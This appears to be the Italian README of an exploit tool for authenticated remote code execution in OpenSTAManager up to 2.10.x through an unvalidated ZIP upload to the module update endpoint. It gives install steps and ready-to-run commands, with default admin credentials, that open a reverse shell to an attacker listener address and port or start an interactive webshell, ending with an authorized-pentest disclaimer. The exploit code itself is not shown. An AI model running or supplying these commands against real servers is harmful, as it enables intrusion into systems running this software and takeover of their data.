
Exploit di esecuzione remota di codice autenticato per OpenSTAManager tramite upload ZIP non validato, che fornisce reverse shell e capacità di webshell interattiva per test di penetrazione autorizzati.
Esecuzione di codice in remoto (RCE) autenticata tramite caricamento ZIP non convalidato nell'endpoint di aggiornamento dei moduli.
Affetto: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope o qualsiasi listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Web shell interattiva
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
Solo per test di penetrazione autorizzati e scopi educativi.